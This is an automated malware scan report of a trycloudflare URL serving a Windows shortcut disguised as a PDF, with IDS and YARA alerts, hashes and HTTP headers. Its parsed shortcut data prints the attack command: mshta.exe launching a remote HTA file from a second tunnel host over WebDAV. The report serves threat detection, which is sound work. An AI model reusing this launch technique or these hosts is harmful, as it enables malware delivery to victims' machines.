Report - valuable-munich-private-institution.trycloudflare.com/1FSVABRA/RE

Report Overview

Visited public
2025-04-15 20:27:37
Tags
URL
valuable-munich-private-institution.trycloudflare.com/1FSVABRA/RE_007394029384393483.pdf.lnk
Finishing URL
about:privatebrowsing
IP / ASN
104.16.231.132
#13335 CLOUDFLARENET
Title
about:privatebrowsing

Detections

urlquery

Network Intrusion Detection

Threat Detection Systems

Domain Summary

Domain / FQDN	Rank	Registered	First Seen	Last Seen	Sent	Received	IP
valuable-munich-private-institution.trycloudflare.com	unknown	2018-07-07	2025-04-15	2025-04-15	560 B	3.2 kB	104.16.230.132

Related reports

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Severity	Source IP	Destination IP	Alert
2025-04-15 20:27:15	low	Client IP	104.16.230.132	ET HUNTING TryCloudFlare Domain in TLS SNI
2025-04-15 20:27:15	low	Client IP	104.16.230.132	ET INFO Observed trycloudflare .com Domain in TLS SNI

Threat Detection Systems

Public InfoSec YARA rules

Scan Date	Severity	Indicator	Alert
2025-04-15	medium	valuable-munich-private-institution.trycloudflare.com/1FSVABRA/RE_007394029384393483.pdf.lnk	Identifies scripting artefacts in shortcut (LNK) files.
2025-04-15	medium	valuable-munich-private-institution.trycloudflare.com/1FSVABRA/RE_007394029384393483.pdf.lnk	Identifies executable artefacts in shortcut (LNK) files.
2025-04-15	medium	valuable-munich-private-institution.trycloudflare.com/1FSVABRA/RE_007394029384393483.pdf.lnk	Identifies shortcut (LNK) file with a long relative path. Might be used in an attempt to hide the path.

OpenPhish

No alerts detected

PhishTank

No alerts detected

Quad9 DNS

No alerts detected

ThreatFox

No alerts detected

Windows Shortcut detected

URL
valuable-munich-private-institution.trycloudflare.com/1FSVABRA/RE_007394029384393483.pdf.lnk
IP / ASN
104.16.230.132
#13335 CLOUDFLARENET

File type
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe", EnableTargetMetadata, Archive, ctime=Sat Sep 15 07:12:47 2018, atime=Sat Sep 15 07:12:47 2018, mtime=Sat Sep 15 07:12:47 2018, length=14848, window=showminnoactive, IDListSize 0x013b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\mshta.exe"
Hash
MD5 60d2c56f6442da684ca824c51a93edde
SHA1 d1fb256e92f812773b6a018637df56e3c63891ee
SHA256 91cdf10ed292a169e32c5df33913845eda527e9940133e894a2e0840c2499a07

Timestamps
Created 2018-09-15 07:12:47
Access 2018-09-15 07:12:47
Write 2018-09-15 07:12:47
Command-line data
Working Directory
Relative Path
..\..\..\..\Windows\System32\mshta.exe
Command Line Arguments
"\\optical-bright-fonts-zealand.trycloudflare.com@SSL\DavWWWRoot\raye.hta"

Detections

Analyzer	Verdict	Alert
Public InfoSec YARA rules	malware	Identifies scripting artefacts in shortcut (LNK) files.
Public InfoSec YARA rules	malware	Identifies executable artefacts in shortcut (LNK) files.
Public InfoSec YARA rules	malware	Identifies shortcut (LNK) file with a long relative path. Might be used in an attempt to hide the path.

JavaScript (0)

HTTP Transactions (1)

URL IP Response Size

valuable-munich-private-institution.trycloudflare.com/1FSVABRA/RE_007394029384393483.pdf.lnk

104.16.230.132

200 OK

2.9 kB

URL User Request GET
valuable-munich-private-institution.trycloudflare.com/1FSVABRA/RE_007394029384393483.pdf.lnk
IP
104.16.230.132:443
ASN
#13335 CLOUDFLARENET

Certificate
IssuerGoogle Trust Services
Subjecttrycloudflare.com
Fingerprint6D:66:63:23:0C:43:AA:38:11:4C:FA:5E:94:D6:0E:E3:93:A7:16:F5
ValiditySat, 22 Feb 2025 16:19:42 GMT - Fri, 23 May 2025 17:19:31 GMT

File type
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe", EnableTargetMetadata, Archive, ctime=Sat Sep 15 07:12:47 2018, atime=Sat Sep 15 07:12:47 2018, mtime=Sat Sep 15 07:12:47 2018, length=14848, window=showminnoactive, IDListSize 0x013b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\mshta.exe"
Size
2.9 kB (2863 bytes)
Hash
60d2c56f6442da684ca824c51a93edde
d1fb256e92f812773b6a018637df56e3c63891ee
91cdf10ed292a169e32c5df33913845eda527e9940133e894a2e0840c2499a07

Detections

Analyzer	Verdict	Alert
Public InfoSec YARA rules	malware	Identifies scripting artefacts in shortcut (LNK) files.
Public InfoSec YARA rules	malware	Identifies executable artefacts in shortcut (LNK) files.
Public InfoSec YARA rules	malware	Identifies shortcut (LNK) file with a long relative path. Might be used in an attempt to hide the path.

HTTP Headers

GET /1FSVABRA/RE_007394029384393483.pdf.lnk HTTP/1.1
Host: valuable-munich-private-institution.trycloudflare.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache

HTTP/2 200 OK
date: Tue, 15 Apr 2025 20:27:15 GMT
content-type: application/octet-stream
content-length: 2863
cf-ray: 930e2ebbfd3d0b65-OSL
cf-cache-status: DYNAMIC
accept-ranges: bytes
etag: "0f47c05885833479d5b95d9881c68149-1742976246-2863"
last-modified: Wed, 26 Mar 2025 08:04:06 GMT
vary: Accept-Encoding
server: cloudflare
X-Firefox-Spdy: h2

Report Overview

Domain Summary

Related reports

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Threat Detection Systems

Public InfoSec YARA rules

OpenPhish

PhishTank

Quad9 DNS

ThreatFox

Windows Shortcut detected

File type

Hash

Timestamps

Command-line data

JavaScript (0)

HTTP Transactions (1)

URL User Request GET

IP

ASN

Certificate

File type

Size

Hash

Detections

HTTP Headers